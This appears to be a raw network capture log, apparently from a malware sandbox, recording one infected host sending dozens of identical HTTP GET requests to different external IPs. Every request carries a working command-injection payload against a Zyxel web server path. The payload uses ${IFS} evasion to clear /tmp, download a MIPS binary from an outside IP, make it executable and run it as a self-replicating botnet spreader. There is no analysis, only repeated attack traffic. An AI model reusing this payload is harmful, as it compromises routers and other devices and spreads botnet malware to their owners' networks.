                                        Jan 14, 2024 16:18:56.733760118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7438192.168.2.133408044.45.147.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733776093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7439192.168.2.1343624212.131.58.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733818054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7440192.168.2.1333174198.73.26.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733906031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7441192.168.2.133665466.94.92.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733999968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7442192.168.2.1356864162.73.9.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734009981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7443192.168.2.1340688129.64.23.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734064102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7444192.168.2.1347748119.61.80.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734112024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7445192.168.2.135639640.124.22.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734139919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7446192.168.2.1344754147.188.145.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734180927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7447192.168.2.1338114154.196.132.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734273911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7448192.168.2.133534272.67.141.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734302998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7449192.168.2.1354884100.245.24.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734339952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7450192.168.2.136098268.56.125.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734390020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7451192.168.2.1346226196.168.80.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734473944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7452192.168.2.133414266.237.37.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734528065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7453192.168.2.1336578160.233.239.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734565020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7454192.168.2.1343640124.155.180.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734616995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7455192.168.2.135174267.0.59.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734668970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7456192.168.2.1353738151.149.28.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734705925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7457192.168.2.1350968179.140.251.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734791040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7458192.168.2.134881027.1.193.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734846115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7459192.168.2.1334974105.124.93.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734903097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7460192.168.2.134267631.7.207.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.734952927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7461192.168.2.1346640179.211.251.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735028982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7462192.168.2.1336660209.53.94.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735079050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7463192.168.2.133987898.24.38.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735132933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7464192.168.2.135731899.98.32.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735173941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7465192.168.2.135724275.140.186.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735259056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7466192.168.2.135242663.23.51.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735291958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7467192.168.2.134703888.226.2.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735358000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7468192.168.2.1355590183.85.178.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735436916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7469192.168.2.1338300186.132.158.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735491991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7470192.168.2.1356064131.150.90.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735538960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7471192.168.2.135593464.32.185.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735610962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7472192.168.2.133554039.5.170.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735672951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7473192.168.2.134710254.154.249.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735727072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7474192.168.2.13346141.14.64.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735797882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7475192.168.2.135181861.202.153.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735877991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7476192.168.2.1348714113.117.243.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.735915899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7477192.168.2.135905646.230.227.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736010075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7478192.168.2.1346460124.84.162.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736037970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7479192.168.2.1356392122.172.68.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736061096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7480192.168.2.1334432145.104.197.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736107111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7481192.168.2.1357958132.1.192.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736200094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7482192.168.2.1358090135.181.158.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736254930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7483192.168.2.1350964136.104.44.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736324072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7484192.168.2.133487219.118.149.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736373901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7485192.168.2.1345400107.232.192.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736422062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7486192.168.2.135011227.54.6.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736481905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7487192.168.2.1345666161.132.171.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736536980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7488192.168.2.1355628182.64.203.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736589909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7489192.168.2.1348418137.202.86.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736648083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7490192.168.2.135748257.4.201.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736690998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7491192.168.2.1358968217.86.217.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736747980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7492192.168.2.134208449.80.50.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736816883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7493192.168.2.1342184123.132.94.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736896038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7494192.168.2.1337584133.34.233.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.736938000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7495192.168.2.1335512150.64.5.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737004995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7496192.168.2.1356464182.103.178.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737075090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7497192.168.2.133480460.134.112.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737106085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7498192.168.2.134083069.50.136.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737179995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7499192.168.2.135558091.109.250.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737224102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7500192.168.2.134612452.195.96.156443
                                        TimestampBytes transferredDirectionData
